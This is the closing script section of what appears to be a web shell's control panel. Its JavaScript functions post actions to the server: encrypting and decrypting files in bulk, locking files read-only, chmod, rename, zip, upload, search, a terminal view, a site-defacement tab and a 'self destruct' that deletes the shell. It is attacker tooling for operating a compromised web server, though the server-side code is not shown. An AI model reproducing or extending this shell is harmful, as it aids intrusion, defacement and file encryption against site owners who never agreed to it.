            <input type="hidden" name="file" value="${path}">
            <input type="hidden" name="decrypt_password" value="${password}">
        `;
        document.body.appendChild(form);
        form.submit();
    }
    
    function lockFile(path) {
        document.getElementById('lockPath').value = path;
        showModal('lockModal');
    }
    
    function performLock() {
        const path = document.getElementById('lockPath').value;
        
        if (!confirm('Lock this file to read-only? This may prevent future modifications.')) {
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="lock_file">
            <input type="hidden" name="lock_path" value="${path}">
        `;
        document.body.appendChild(form);
        form.submit();
    }
    
    function performMassEncrypt() {
        const password = document.getElementById('massEncryptPassword').value;
        
        if (!password) {
            alert('Please enter a password');
            return;
        }
        
        if (selectedItems.size === 0) {
            alert('Please select items first');
            return;
        }
        
        if (!confirm(`Encrypt ${selectedItems.size} selected items?`)) {
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="mass_encrypt">
            <input type="hidden" name="mass_encrypt_password" value="${password}">
        `;
        
        selectedItems.forEach(item => {
            form.innerHTML += `<input type="hidden" name="selected_items[]" value="${item}">`;
        });
        
        document.body.appendChild(form);
        form.submit();
    }
    
    function performMassDecrypt() {
        const password = document.getElementById('massDecryptPassword').value;
        
        if (!password) {
            alert('Please enter a password');
            return;
        }
        
        if (selectedItems.size === 0) {
            alert('Please select items first');
            return;
        }
        
        if (!confirm(`Decrypt ${selectedItems.size} selected items?`)) {
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="mass_decrypt">
            <input type="hidden" name="mass_decrypt_password" value="${password}">
        `;
        
        selectedItems.forEach(item => {
            form.innerHTML += `<input type="hidden" name="selected_items[]" value="${item}">`;
        });
        
        document.body.appendChild(form);
        form.submit();
    }
    
    function renameItem(path) {
        document.getElementById('renameOldPath').value = path;
        document.getElementById('renameNewName').value = path.split('/').pop();
        showModal('renameModal');
    }
    
    function performRename() {
        const oldPath = document.getElementById('renameOldPath').value;
        const newName = document.getElementById('renameNewName').value;
        
        if (!newName) {
            alert('Please enter a new name');
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="rename">
            <input type="hidden" name="old_path" value="${oldPath}">
            <input type="hidden" name="new_name" value="${newName}">
        `;
        
        document.body.appendChild(form);
        form.submit();
    }
    
    function chmodItem(path) {
        document.getElementById('chmodPath').value = path;
        showModal('chmodModal');
    }
    
    function performChmod() {
        const path = document.getElementById('chmodPath').value;
        const permission = document.getElementById('chmodPermission').value;
        
        if (!permission || !/^[0-7]{3,4}$/.test(permission)) {
            alert('Please enter valid permission (e.g., 755, 0644, 0444)');
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="chmod">
            <input type="hidden" name="chmod_path" value="${path}">
            <input type="hidden" name="chmod_permission" value="${permission}">
        `;
        
        document.body.appendChild(form);
        form.submit();
    }
    
    function performZip() {
        const zipName = document.getElementById('zipName').value;
        
        if (!zipName) {
            alert('Please enter a zip file name');
            return;
        }
        
        if (selectedItems.size === 0) {
            alert('Please select items first');
            return;
        }
        
        if (!confirm(`Create zip archive "${zipName}.zip" from ${selectedItems.size} selected items?`)) {
            return;
        }
        
        showLoader();
        const form = document.createElement('form');
        form.method = 'POST';
        form.innerHTML = `
            <input type="hidden" name="action" value="zip_selected">
            <input type="hidden" name="zip_name" value="${zipName}">
        `;
        
        selectedItems.forEach(item => {
            form.innerHTML += `<input type="hidden" name="selected_items[]" value="${item}">`;
        });
        
        document.body.appendChild(form);
        form.submit();
    }
    
    function createNew(type) {
        hideModal('createModal');
        const name = prompt(`Enter ${type} name:`);
        if (name) {
            showLoader();
            const form = document.createElement('form');
            form.method = 'POST';
            if (type === 'file') {
                form.innerHTML = `
                    <input type="hidden" name="action" value="create_file">
                    <input type="hidden" name="new_filename" value="${name}">
                `;
            } else {
                form.innerHTML = `
                    <input type="hidden" name="action" value="create_folder">
                    <input type="hidden" name="new_foldername" value="${name}">
                `;
            }
            document.body.appendChild(form);
            form.submit();
        }
    }
    
    function selfDestruct() {
        showModal('selfDestructModal');
    }
    
    function confirmSelfDestruct() {
        if (confirm('FINAL CONFIRMATION: This will permanently delete the shell!\n\nClick OK to proceed.')) {
            showLoader();
            const form = document.createElement('form');
            form.method = 'POST';
            form.innerHTML = '<input type="hidden" name="action" value="self_destruct">';
            document.body.appendChild(form);
            form.submit();
        }
    }
    
    function handleSearch(event) {
        const query = event.target.value;
        document.getElementById('searchInput').value = query;
        
        if (searchTimeout) {
            clearTimeout(searchTimeout);
        }
        
        if (query.length > 0) {
            searchTimeout = setTimeout(() => {
                getSearchSuggestions(query);
            }, 300);
        } else {
            hideSuggestions();
        }
        
        if (event.key === 'Enter') {
            performSearch(query);
        }
    }
    
    function performSearch(query) {
        showLoader();
        const url = new URL(window.location);
        if (query.trim()) {
            url.searchParams.set('search', query);
        } else {
            url.searchParams.delete('search');
        }
        url.searchParams.delete('result');
        window.location.href = url;
    }
    
    function clearSearch() {
        document.getElementById('searchInput').value = '';
        const url = new URL(window.location);
        url.searchParams.delete('search');
        url.searchParams.delete('result');
        window.location.href = url;
    }
    
    function clearSearchWithoutRefresh() {
        const searchInput = document.getElementById('searchInput');
        if (searchInput) searchInput.value = '';
        const url = new URL(window.location);
        url.searchParams.delete('search');
        window.history.replaceState({}, '', url);
        
        const searchResultsDiv = document.querySelector('[style*="Search Results"]');
        if (searchResultsDiv) searchResultsDiv.style.display = 'none';
        
        hideSuggestions();
    }
    
    function getSearchSuggestions(query) {
        if (!query.trim()) {
            hideSuggestions();
            return;
        }
        
        fetch(`?get_suggestions=1&search=${encodeURIComponent(query)}`)
            .then(response => response.json())
            .then(suggestions => {
                const container = document.getElementById('searchSuggestions');
                container.innerHTML = '';
                
                if (suggestions.length > 0) {
                    suggestions.forEach(suggestion => {
                        const div = document.createElement('div');
                        div.className = 'suggestion-item';
                        
                        div.innerHTML = `
                            <div class="suggestion-icon ${suggestion.type === 'dir' ? 'dir' : 'file'}">
                                ${suggestion.type === 'dir' ? 'D' : 'F'}
                            </div>
                            <div style="flex: 1;">${suggestion.name}</div>
                            ${suggestion.encrypted ? '<span style="color: var(--success); font-size: 10px;">ENC</span>' : ''}
                        `;
                        
                        div.onclick = () => {
                            const encodedPath = encodeURIComponent(suggestion.path);
                            const checkboxes = document.querySelectorAll('.file-checkbox');
                            let foundElement = null;
                            
                            checkboxes.forEach(cb => {
                                if (cb.value === encodedPath) {
                                    foundElement = cb.closest('.file-item');
                                }
                            });
                            
                            if (foundElement) {
                                foundElement.scrollIntoView({ 
                                    behavior: 'smooth', 
                                    block: 'center' 
                                });
                                
                                foundElement.classList.add('highlight-scroll-target');
                                
                                setTimeout(() => {
                                    foundElement.classList.remove('highlight-scroll-target');
                                }, 3000);
                                
                                document.getElementById('searchInput').value = suggestion.name;
                            } else {
                                if (suggestion.type === 'dir') {
                                    navigateToPath(suggestion.path);
                                } else {
                                    document.getElementById('searchInput').value = suggestion.name;
                                    performSearch(suggestion.name);
                                }
                            }
                            
                            hideSuggestions();
                        };
                        
                        container.appendChild(div);
                    });
                    showSuggestions();
                } else {
                    hideSuggestions();
                }
            })
            .catch(() => {
                hideSuggestions();
            });
    }
    
    function showSuggestions() {
        const container = document.getElementById('searchSuggestions');
        if (container.innerHTML.trim() !== '') {
            container.style.display = 'block';
        }
    }
    
    function hideSuggestions() {
        setTimeout(() => {
            const container = document.getElementById('searchSuggestions');
            if (container) {
                container.style.display = 'none';
            }
        }, 200);
    }
    
    function switchDefaceTab(tab) {
        document.querySelectorAll('.deface-tab-content').forEach(t => t.classList.remove('active'));
        document.querySelectorAll('.deface-tab-btn').forEach(b => b.classList.remove('active'));
        
        document.getElementById('deface' + tab.charAt(0).toUpperCase() + tab.slice(1) + 'Tab').classList.add('active');
        event.target.classList.add('active');
    }
    
    function showModal(modalId) {
        document.getElementById(modalId).classList.add('active');
    }
    
    function hideModal(modalId) {
        document.getElementById(modalId).classList.remove('active');
    }
    
    function scrollTerminalToBottom() {
        const output = document.getElementById('terminalOutput');
        if (output) {
            output.scrollTop = output.scrollHeight;
        }
    }
    
    function checkTerminalScroll() {
        const output = document.getElementById('terminalOutput');
        const indicator = document.getElementById('scrollIndicator');
        
        if (output && indicator) {
            if (output.scrollHeight > output.clientHeight && 
                output.scrollTop < output.scrollHeight - output.clientHeight - 50) {
                indicator.style.display = 'block';
            } else {
                indicator.style.display = 'none';
            }
        }
    }
    
    function showLoader() {
        const loader = document.getElementById('loader');
        if (loader) loader.style.display = 'block';
    }
    
    function hideLoader() {
        const loader = document.getElementById('loader');
        if (loader) loader.style.display = 'none';
    }
    
    function handleDragOver(e) {
        e.preventDefault();
        e.stopPropagation();
        e.dataTransfer.dropEffect = 'copy';
    }
    
    function handleDrop(e) {
        e.preventDefault();
        e.stopPropagation();
        
        const files = e.dataTransfer.files;
        if (files.length > 0) {
            document.getElementById('fileInput').files = files;
            showLoader();
            document.getElementById('uploadForm').submit();
        }
    }
    
    function handleFileSelect() {
        if (document.getElementById('fileInput').files.length > 0) {
            showLoader();
            document.getElementById('uploadForm').submit();
        }
    }
    </script>
</body>
</html>